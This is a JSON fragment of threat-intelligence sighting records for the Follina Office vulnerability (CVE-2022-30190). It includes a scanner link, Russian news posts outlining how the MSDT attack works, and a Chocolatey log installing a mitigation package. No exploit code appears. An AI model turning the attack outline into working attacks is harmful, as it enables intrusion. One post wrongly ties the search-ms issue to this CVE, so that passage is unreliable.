"CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6797", "content": "#tools\n#Blue_Team_Techniques\n1. FollinaScanner - A tool that scans files & directories for the Follina exploit (CVE-2022-30190)\nhttps://github.com/ErrorNoInternet/FollinaScanner\n2. On Challenges in Verifying Trusted Executable Files in Memory Forensics (+ .pdf)\nhttps://www.sciencedirect.com/science/article/pii/S2666281720300123?via%3Dihub\n]-> Microsoft Authenticode:\nhttps://reversea.me/index.php/authenticode-i-understanding-windows-authenticode", "creation_timestamp": "2022-09-14T11:01:01.000000Z"}, {"uuid": "1177c63b-f347-4d0c-974d-20aa2221727b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/binary_xor/567", "content": "#news \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Microsoft Office \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u044b\u0445 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u0430\u044f Follina, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u0442\u044f\u043d\u0443\u0442\u044c \u0437\u043b\u043e\u0432\u0440\u0435\u0434 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c Powershell-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e MSDT \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430. \u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043d\u0435 \u043d\u0443\u0436\u043d\u044b \u043d\u0438 \u043c\u0430\u043a\u0440\u043e\u0441\u044b, \u043d\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u041d\u0435\u0442 \u0442\u043e\u043b\u043a\u0443 \u0438 \u043e\u0442 Windows Defender\u2019a. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, RTF-\u0444\u0430\u0439\u043b \u0434\u0430\u0436\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e: \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0430\u043d\u0435\u043b\u044c \u043f\u0440\u0435\u0432\u044c\u044e. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 MS, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 2013.\n\n\u0421\u0430\u043c\u043e\u0435 \u0437\u0430\u043d\u044f\u0442\u043d\u043e\u0435, \u041c\u0435\u043b\u043a\u043e\u0441\u043e\u0444\u0442\u0443 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0435\u0449\u0451 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435, \u043d\u043e \u0442\u0438\u043a\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u043b\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0435\u0451 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0430. \u041d\u0443, \u0437\u0430\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0433\u0443\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438. \u0417\u0430\u043f\u043e\u0437\u0434\u0430\u043b\u044b\u0439 \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u043e\u0431\u0435\u0449\u0430\u043d, \u0430 \u043f\u043e\u043a\u0430 \u0432\u043e\u0440\u0434\u043e\u0432\u0441\u043a\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u043f\u043e\u0447\u0442\u0435 \u0434\u0430\u0436\u0435 \u043a\u0443\u0440\u0441\u043e\u0440\u043e\u043c \u0433\u043b\u0430\u0434\u0438\u0442\u044c \u043d\u0435 \u0441\u0442\u043e\u0438\u0442.\n\n@tomhunter", "creation_timestamp": "2023-02-08T23:37:32.000000Z"}, {"uuid": "6c49f5db-3505-42b2-a201-71cd75c63127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/LearnExploit/4351", "content": "1. Follina (CVE-2022-30190)\n\n2. Log4Shell (CVE-2021-44228)\n\n3. Spring4Shell (CVE-2022-22965)\n\n4. F5 BIG-IP (CVE-2022-1388)\n\n5. Google Chrome zero-day (CVE-2022-0609)\n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n#Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}, {"uuid": "cdcd5fa3-2484-4e25-8e84-0385e7a509c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/onfpowernemesis/3211", "content": "\u041d\u0435\u043c\u0435Z\u0438\u0434\u0430 (Telegram)\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. \u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b,...\n\n\u041f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0441\u0442", "creation_timestamp": "2025-01-14T13:35:58.000000Z"}, {"uuid": "1a05a769-f2e1-4f3e-8b78-49209a0e04c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/a56235a3268e34cdfbe43b31aa0654d4", "content": "2026-06-09 18:35:48,359 4968 [DEBUG] - XmlConfiguration is now operational\n2026-06-09 18:35:48,641 4968 [DEBUG] - Adding new type 'CygwinService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,661 4968 [DEBUG] - Adding new type 'CygwinService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,661 4968 [DEBUG] - Adding new type 'PythonService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,672 4968 [DEBUG] - Adding new type 'PythonService' for type 'IListSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,672 4968 [DEBUG] - Adding new type 'PythonService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,720 4968 [DEBUG] - Adding new type 'PythonService' for type 'IUninstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,720 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,734 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IListSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,734 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,750 4968 [DEBUG] - Adding new type 'SystemStateValidation' for type 'IValidation' from assembly 'choco'\n2026-06-09 18:35:48,750 4968 [DEBUG] - Adding new type 'CacheFolderLockdownValidation' for type 'IValidation' from assembly 'choco'\n2026-06-08 18:07:05,653 4968 [DEBUG] - Adding new type 'FrameWorkReferencesMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,667 4968 [DEBUG] - Adding new type 'IconMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,667 4968 [DEBUG] - Adding new type 'LicenseMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,687 4968 [DEBUG] - Adding new type 'PackageTypesMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,687 4968 [DEBUG] - Adding new type 'ReadmeMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RepositoryMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RequiredMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RequireLicenseAcceptanceMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,715 4968 [DEBUG] - Adding new type 'ServicableMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,715 4968 [DEBUG] - Adding new type 'VersionMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,762 4968 [DEBUG] - Registering new command 'apikey' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'cache' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'config' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'export' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'feature' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'help' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'info' in assembly 'choco'\n2026-06-08 18:07:05,810 4968 [DEBUG] - Registering new command 'install' in assembly 'choco'\n2026-06-08 18:07:05,810 4968 [DEBUG] - Registering new command 'license' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'list' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'new' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'outdated' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 [DEBUG] - Registering new command 'pack' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 [DEBUG] - Registering new command 'pin' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 [DEBUG] - Registering new command 'push' in assembly 'choco'\n2026-06-08 18:07:05,856 4968 [DEBUG] - Registering new command 'rule' in assembly 'choco'\n2026-06-08 18:07:05,856 4968 [DEBUG] - Registering new command 'search' in assembly 'choco'\n2026-06-08 18:07:05,872 4968 [DEBUG] - Registering new command 'source' in assembly 'choco'\n2026-06-08 18:07:05,892 4968 [DEBUG] - Registering new command 'support' in assembly 'choco'\n2026-06-08 18:07:05,903 4968 [DEBUG] - Registering new command 'template' in assembly 'choco'\n2026-06-08 18:07:05,903 4968 [DEBUG] - Registering new command 'uninstall' in assembly 'choco'\n2026-06-08 18:07:05,918 4968 [DEBUG] - Registering new command 'unpackself' in assembly 'choco'\n2026-06-08 18:07:05,918 4968 [DEBUG] - Registering new command 'upgrade' in assembly 'choco'\n2026-06-08 18:07:06,434 4968 [INFO ] - ============================================================\n2026-06-08 18:07:07,011 4968 [INFO ] - Chocolatey v2.7.2\n2026-06-08 18:07:07,044 4968 [DEBUG] - Chocolatey is running on Windows v 10.0.17763.0\n2026-06-08 18:07:07,059 4968 [DEBUG] - Attempting to delete file \"C:/ProgramData/chocolatey/choco.exe.old\".\n2026-06-08 18:07:07,059 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\choco.exe.old\".\n2026-06-08 18:07:07,106 4968 [DEBUG] - Command line: \"C:\\ProgramData\\chocolatey\\choco.exe\" install disable-ms-msdt --version 1.0.0 -fdvy --execution-timeout=2700 --allow-downgrade\n2026-06-08 18:07:07,106 4968 [DEBUG] - Received arguments: install disable-ms-msdt --version 1.0.0 -fdvy --execution-timeout=2700 --allow-downgrade\n2026-06-08 18:07:07,372 4968 [DEBUG] - RemovePendingPackagesTask is now ready and waiting for PreRunMessage.\n2026-06-08 18:07:07,417 4968 [DEBUG] - Sending message 'PreRunMessage' out if there are subscribers...\n2026-06-08 18:07:07,465 4968 [DEBUG] - [Pending] Removing all pending packages that should not be considered installed...\n2026-06-08 18:07:07,823 4968 [DEBUG] - Performing validation checks.\n2026-06-08 18:07:07,857 4968 [DEBUG] - Global Configuration Validation Checks:\n2026-06-08 18:07:07,857 4968 [DEBUG] -  - Package Exit Code / Exit On Reboot = Checked\n2026-06-08 18:07:07,889 4968 [DEBUG] - System State Validation Checks:\n2026-06-08 18:07:07,903 4968 [DEBUG] -  Reboot Requirement Checks:\n2026-06-08 18:07:07,919 4968 [DEBUG] -  - Pending Computer Rename = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending Component Based Servicing = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending Windows Auto Update = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending File Rename Operations = Ignored\n2026-06-08 18:07:07,949 4968 [DEBUG] -  - Pending Windows Package Installer = Checked\n2026-06-08 18:07:07,949 4968 [DEBUG] -  - Pending Windows Package Installer SysWow64 = Checked\n2026-06-08 18:07:07,966 4968 [DEBUG] - Cache Folder Lockdown Checks:\n2026-06-08 18:07:07,980 4968 [DEBUG] -  - Elevated State = Checked\n2026-06-08 18:07:07,980 4968 [DEBUG] -  - Folder Exists = Checked\n2026-06-08 18:07:08,013 4968 [DEBUG] -  - Folder lockdown = Checked\n2026-06-08 18:07:08,033 4968 [INFO ] - 3 validations performed. 3 success(es), 0 warning(s), and 0 error(s).\n2026-06-08 18:07:08,115 4968 [DEBUG] - The source 'c:\\cached-packages;https://community.chocolatey.org/api/v2/' evaluated to a 'normal' source type\n2026-06-08 18:07:08,120 4968 [DEBUG] - \nNOTE: Hiding sensitive configuration data! Please double and triple\n check to be sure no sensitive data is shown, especially if copying\n output to a gist for review.\n2026-06-08 18:07:08,198 4968 [DEBUG] - Configuration: CommandName='install'|\nCacheLocation='C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey'|\nCommandExecutionTimeoutSeconds='2700'|WebRequestTimeoutSeconds='30'|\nSources='c:\\cached-packages;https://community.chocolatey.org/api/v2/'|\nSourceType='normal'|IncludeConfiguredSources='False'|\nShowOnlineHelp='False'|Debug='True'|Verbose='True'|Trace='False'|\nForce='True'|Noop='False'|HelpRequested='False'|\nUnsuccessfulParsing='False'|RegularOutput='True'|QuietOutput='False'|\nPromptForConfirmation='False'|DisableCompatibilityChecks='False'|\nAcceptLicense='True'|AllowUnofficialBuild='False'|\nInput='disable-ms-msdt'|Version='1.0.0'|AllVersions='False'|\nSkipPackageInstallProvider='False'|SkipHookScripts='False'|\nPackageNames='disable-ms-msdt'|Prerelease='False'|ForceX86='False'|\nOverrideArguments='False'|NotSilent='False'|\nApplyPackageParametersToDependencies='False'|\nApplyInstallArgumentsToDependencies='False'|IgnoreDependencies='False'|\nUseHttpCache='True'|CacheExpirationInMinutes='30'|\nAllowDowngrade='True'|\nForceDependencies='False'|PinPackage='False'|IncludeHeaders='False'|\nInformation.PlatformType='Windows'|\nInformation.PlatformVersion='10.0.17763.0'|\nInformation.PlatformName='Windows Server 2019'|\nInformation.ChocolateyVersion='2.7.2.0'|\nInformation.ChocolateyProductVersion='2.7.2'|\nInformation.FullName='choco, Version=2.7.2.0, Culture=neutral, PublicKeyToken=79d02ea9cad655eb'|\n\nInformation.Is64BitOperatingSystem='True'|\nInformation.Is64BitProcess='True'|Information.IsInteractive='False'|\nInformation.UserName='vagrant'|\nInformation.UserDomainName='WIN-D074OMMMISC'|\nInformation.IsUserAdministrator='True'|\nInformation.IsUserSystemAccount='False'|\nInformation.IsUserRemoteDesktop='False'|\nInformation.IsUserRemote='True'|\nInformation.IsProcessElevated='True'|\nInformation.IsLicensedVersion='False'|\nInformation.IsLicensedAssemblyLoaded='False'|\nInformation.LicenseType='Foss'|\nInformation.CurrentDirectory='C:\\Users\\vagrant'|\nFeatures.AutoUninstaller='True'|Features.ChecksumFiles='True'|\nFeatures.AllowEmptyChecksums='False'|\nFeatures.AllowEmptyChecksumsSecure='True'|\nFeatures.FailOnAutoUninstaller='False'|\nFeatures.FailOnStandardError='False'|Features.UsePowerShellHost='True'|\nFeatures.LogEnvironmentValues='True'|Features.LogWithoutColor='False'|\nFeatures.VirusCheck='False'|\nFeatures.FailOnInvalidOrMissingLicense='False'|\nFeatures.IgnoreInvalidOptionsSwitches='True'|\nFeatures.UsePackageExitCodes='True'|\nFeatures.UseEnhancedExitCodes='False'|\nFeatures.UseFipsCompliantChecksums='False'|\nFeatures.ShowNonElevatedWarnings='True'|\nFeatures.ShowDownloadProgress='False'|\nFeatures.StopOnFirstPackageFailure='False'|\nFeatures.UseRememberedArgumentsForUpgrades='False'|\nFeatures.IgnoreUnfoundPackagesOnUpgradeOutdated='False'|\nFeatures.SkipPackageUpgradesWhenNotInstalled='False'|\nFeatures.RemovePackageInformationOnUninstall='False'|\nFeatures.ExitOnRebootDetected='False'|\nFeatures.LogValidationResultsOnWarnings='True'|\nFeatures.UsePackageRepositoryOptimizations='True'|\nFeatures.UsePackageHashValidation='False'|\nListCommand.LocalOnly='False'|\nListCommand.IdOnly='False'|ListCommand.IncludeRegistryPrograms='False'|\nListCommand.PageSize='25'|ListCommand.Exact='False'|\nListCommand.ByIdOnly='False'|ListCommand.ByTagOnly='False'|\nListCommand.IdStartsWith='False'|ListCommand.IgnorePinned='False'|\nListCommand.OrderBy='Id'|ListCommand.OrderByPopularity='False'|\nListCommand.ApprovedOnly='False'|\nListCommand.DownloadCacheAvailable='False'|\nListCommand.NotBroken='False'|\nListCommand.IncludeVersionOverrides='False'|\nListCommand.ExplicitPageSize='False'|\nListCommand.ExplicitSource='False'|\nUpgradeCommand.FailOnUnfound='False'|\nUpgradeCommand.FailOnNotInstalled='False'|\nUpgradeCommand.NotifyOnlyAvailableUpgrades='False'|\nUpgradeCommand.ExcludePrerelease='False'|\nUpgradeCommand.IgnorePinned='False'|\nNewCommand.AutomaticPackage='False'|\nNewCommand.UseOriginalTemplate='False'|SourceCommand.Command='unknown'|\nSourceCommand.Priority='0'|SourceCommand.BypassProxy='False'|\nSourceCommand.AllowSelfService='False'|\nSourceCommand.VisibleToAdminsOnly='False'|\nFeatureCommand.Command='unknown'|ConfigCommand.Command='Unknown'|\nApiKeyCommand.Command='Unknown'|PinCommand.Command='Unknown'|\nLicenseCommand.Command='Unknown'|OutdatedCommand.IgnorePinned='False'|\nExportCommand.IncludeVersionNumbers='False'|Proxy.BypassOnLocal='True'|\nTemplateCommand.Command='unknown'|CacheCommand.Command='Unknown'|\nCacheCommand.RemoveExpiredItemsOnly='False'|\n2026-06-08 18:07:08,215 4968 [DEBUG] - _ Chocolatey:ChocolateyInstallCommand - Normal Run Mode _\n2026-06-08 18:07:08,231 4968 [INFO ] - Installing the following packages:\n2026-06-08 18:07:08,250 4968 [INFO ] - disable-ms-msdt\n2026-06-08 18:07:08,250 4968 [INFO ] - By installing, you accept licenses for the packages.\n2026-06-08 18:07:08,296 4968 [DEBUG] - Current environment values (may contain sensitive data):\n2026-06-08 18:07:08,296 4968 [DEBUG] -   * 'Path'='C:\\Users\\vagrant\\AppData\\Local\\Microsoft\\WindowsApps;' ('User')\n2026-06-08 18:07:08,296 4968 [DEBUG] -   * 'TEMP'='C:\\Users\\vagrant\\AppData\\Local\\Temp' ('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 'TMP'='C:\\Users\\vagrant\\AppData\\Local\\Temp' ('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 'ChocolateyLastPathUpdate'='134254154512741611' ('User')\n2026-06-08 18:07:08,309 4968 [DEBUG] -   * 'ComSpec'='C:\\Windows\\system32\\cmd.exe' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'DriverData'='C:\\Windows\\System32\\Drivers\\DriverData' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'OS'='Windows_NT' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'Path'='C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\ProgramData\\chocolatey\\bin' ('Machine')\n2026-06-08 18:07:08,325 4968 [DEBUG] -   * 'PATHEXT'='.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'PROCESSOR_ARCHITECTURE'='AMD64' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'PSModulePath'='C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules' ('Machine')\n2026-06-08 18:07:08,339 4968 [DEBUG] -   * 'TEMP'='C:\\Windows\\TEMP' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'TMP'='C:\\Windows\\TEMP' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'USERNAME'='SYSTEM' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'windir'='C:\\Windows' ('Machine')\n2026-06-08 18:07:08,356 4968 [DEBUG] -   * 'NUMBER_OF_PROCESSORS'='10' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_LEVEL'='6' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_IDENTIFIER'='Intel64 Family 6 Model 85 Stepping 7, GenuineIntel' ('Machine')\n2026-06-08 18:07:08,372 4968 [DEBUG] -   * 'PROCESSOR_REVISION'='5507' ('Machine')\n2026-06-08 18:07:08,372 4968 